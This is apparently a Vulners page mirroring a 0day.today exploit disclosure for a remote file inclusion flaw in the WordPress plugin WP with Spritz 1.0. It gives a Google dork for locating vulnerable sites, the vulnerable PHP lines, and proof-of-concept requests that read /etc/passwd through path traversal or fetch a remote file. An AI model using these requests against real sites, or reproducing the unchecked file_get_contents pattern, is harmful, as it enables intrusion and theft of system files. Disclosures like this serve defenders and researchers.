Lucene search
K

WordPress WP with Spritz 1.0 Plugin - Remote File Inclusion Vulnerability

🗓️ 26 Apr 2018 00:00:00Reported by WadeekType 
zdt
 zdt
🔗 0day.today👁 41 Views

WordPress WP with Spritz 1.0 Plugin - Remote File Inclusion Vulnerability, Version Disclosure, Source Code, Proof of Concep

Code
# Exploit Title: WordPress Plugin WP with Spritz 1.0 - Remote File Inclusion
# Exploit Author: Wadeek
# Software Link: https://downloads.wordpress.org/plugin/wp-with-spritz.zip
# Software Version: 1.0
# Google Dork: intitle:("Spritz Login Success") AND inurl:("wp-with-spritz/wp.spritz.login.success.html")
# Tested on: Apache2 with PHP 7 on Linux
# Category: webapps
 
 
1. Version Disclosure
 
/wp-content/plugins/wp-with-spritz/readme.txt
 
2. Source Code
 
if(isset($_GET['url'])){
$content=file_get_contents($_GET['url']);
 
3. Proof of Concept
 
/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd
/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=http(s)://domain/exec

#  0day.today [2018-04-26]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation